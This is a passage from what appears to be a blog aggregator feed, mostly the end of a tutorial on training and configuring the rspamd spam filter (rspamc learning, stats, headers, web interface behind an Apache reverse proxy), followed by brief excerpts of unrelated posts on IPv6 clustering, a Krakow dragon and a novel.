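The Bayesian classifier performs much better when it also knows what ham looks like, so a matching entry for a folder of known-good mail is worth adding. A sketch, assuming a hypothetical .Archive maildir next to the .Spam one; point it at whatever folder holds mail you trust:

 # the .Archive path below is only an example of a known-good mail folder
 @daily /bin/find /storage/vmails/balaskas.gr/evaggelos/.Archive/cur/ -type f -mtime -1 -exec rspamc learn_ham {} \;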

Training from mbox

First of all: seriously?

Split mbox

There is a nice and simple way to split an mbox into separate files for rspamc to consume:

# awk '/^From / {i++}{print > "msg"i}' Spam

and then feed rspamc:

# ls -1 msg* | xargs rspamc --verbose learn_spam

Stats

# rspamc stat


Results for command: stat (0.068 seconds)
Messages scanned: 2
Messages with action reject: 0, 0.00%
Messages with action soft reject: 0, 0.00%
Messages with action rewrite subject: 0, 0.00%
Messages with action add header: 2, 100.00%
Messages with action greylist: 0, 0.00%
Messages with action no action: 0, 0.00%
Messages treated as spam: 2, 100.00%
Messages treated as ham: 0, 0.00%
Messages learned: 1859
Connections count: 2
Control connections count: 2157
Pools allocated: 2191
Pools freed: 2170
Bytes allocated: 542k
Memory chunks allocated: 41
Shared chunks allocated: 10
Chunks freed: 0
Oversized chunks: 736
Fuzzy hashes in storage "rspamd.com": 659509399
Fuzzy hashes stored: 659509399
Statfile: BAYES_SPAM type: sqlite3; length: 32.66M; free blocks: 0; total blocks: 430.29k; free: 0.00%; learned: 1859; users: 1; languages: 4
Statfile: BAYES_HAM type: sqlite3; length: 9.22k; free blocks: 0; total blocks: 0; free: 0.00%; learned: 0; users: 1; languages: 1
Total learns: 1859

X-Spamd-Result

To view the spam score in every email, we need to enable extended reporting headers and to do that we need to edit our configuration:

# vim /etc/rspamd/modules.d/milter_headers.conf

and just above the use line, add:

    # ebal, Wed, 06 Sep 2017 01:52:08 +0300
    extended_spam_headers = true;

   use = [];

then reload rspamd:

# /etc/init.d/rspamd reload

syntax OK
Reloading rspamd:                                          [  OK  ]

View Source

If you open the email in view-source, then you will see something like this:


X-Rspamd-Queue-Id: D0A5728ABF
X-Rspamd-Server: centos69
X-Spamd-Result: default: False [3.40 / 15.00]

Web Server

Rspamd comes with its own web server. That is really useful if you don't have a web server on your mail server, but exposing it directly is not recommended.

By default, the rspamd web server only listens for local connections. We can see that from the ss output below:

# ss -lp | egrep -i rspamd

LISTEN     0      128                    :::11332                   :::*        users:(("rspamd",7469,10),("rspamd",7471,10),("rspamd",7472,10),("rspamd",7473,10))
LISTEN     0      128                     *:11332                    *:*        users:(("rspamd",7469,9),("rspamd",7471,9),("rspamd",7472,9),("rspamd",7473,9))
LISTEN     0      128                    :::11333                   :::*        users:(("rspamd",7469,18),("rspamd",7473,18))
LISTEN     0      128                     *:11333                    *:*        users:(("rspamd",7469,16),("rspamd",7473,16))
LISTEN     0      128                   ::1:11334                   :::*        users:(("rspamd",7469,14),("rspamd",7472,14),("rspamd",7473,14))
LISTEN     0      128             127.0.0.1:11334                    *:*        users:(("rspamd",7469,12),("rspamd",7472,12),("rspamd",7473,12))

127.0.0.1:11334

So if you want to change that (don't!), you have to edit rspamd.conf (the core file):

# vim +/11334 /etc/rspamd/rspamd.conf

and change this line:

bind_socket = "localhost:11334";

to something like this:

bind_socket = "YOUR_SERVER_IP:11334";

or use sed:

# sed -i -e 's/localhost:11334/YOUR_SERVER_IP:11334/' /etc/rspamd/rspamd.conf

and then fire up your browser:

rspamd_worker.png

Web Password

It is a good tactic to change the default password of this web-gui to something else.

# vim /etc/rspamd/worker-controller.inc

  # password = "q1";
  password = "password";

It is always a good idea to restart rspamd after changing its configuration.

Reverse Proxy

I don't like having any web app exposed without SSL or basic authentication, so I shall put the rspamd web server behind a reverse proxy (apache).

So on httpd-2.2 the configuration is something like this:

ProxyPreserveHost On

<Location /rspamd>
    AuthName "Rspamd Access"
    AuthType Basic
    AuthUserFile /etc/httpd/rspamd_htpasswd
    Require valid-user

    ProxyPass http://127.0.0.1:11334
    ProxyPassReverse http://127.0.0.1:11334 

    Order allow,deny
    Allow from all 

</Location>

Http Basic Authentication

You need to create the file that is going to be used to store usernames and password for basic authentication:

# htpasswd -csb /etc/httpd/rspamd_htpasswd rspamd rspamd_passwd
Adding password for user rspamd

restart your apache instance.

bind_socket

Of course, for this to work, we need to change the bind socket in rspamd.conf back to localhost.
Don't forget this ;)

bind_socket = "127.0.0.1:11334";

Selinux

If there is a problem with selinux, then:

# setsebool -P httpd_can_network_connect=1

or

# setsebool httpd_can_network_connect_db on

Errors ?

If you see an error like this:
IO write error

when running rspamc, then you need to explicitly tell it which address to use:

rspamc -h 127.0.0.1:11334

To prevent any future errors, I’ve created a shell wrapper:

/usr/local/bin/rspamc

#!/bin/sh
/usr/bin/rspamc -h 127.0.0.1:11334 $*

Final Thoughts

I have been using rspamd for a while now and I am pretty happy with it.

I’ve set up a spamtrap email address to feed my spam folder and let the cron script train rspamd.

So after a thousand emails:

rspamd1k.jpg

September 27, 2017 12:05 AM

September 24, 2017

Raymii.org

Adding IPv6 to a keepalived and haproxy cluster

At work I regularly build high-available clusters for customers, where the setup is distributed over multiple datacenters with failover software. If one component fails, the service doesn't experience issues or downtime due to the failure. Recently I was tasked with expanding a cluster setup to be also reachable via IPv6. This article goes over the settings and configuration required for haproxy and keepalived for IPv6. The internal cluster will only be IPv4, the loadbalancer terminates HTTP and HTTPS connections.

September 24, 2017 12:00 AM

September 23, 2017

Sarah Allen

memories of dragons

In my recent trip to Krakow, I bought a little blue stuffed dragon for my niece. I became curious about the legend of the Krakow dragon and wanted to find a children’s story to listen to and maybe learn a little Polish and found a fun, modern interpretation: Smok.

Two photos: Krakow dragon statue  and child shadow that kind of looks like a dragon

by sarah at September 23, 2017 03:52 PM

Evaggelos Balaskas

Walkaway by Cory Doctorow

Walkaway by Cory Doctorow

Are you willing to walk-away without anything in the world to build a better world ?

walkaway.jpg

Tag(s): books

September 23, 2017 09:36 AM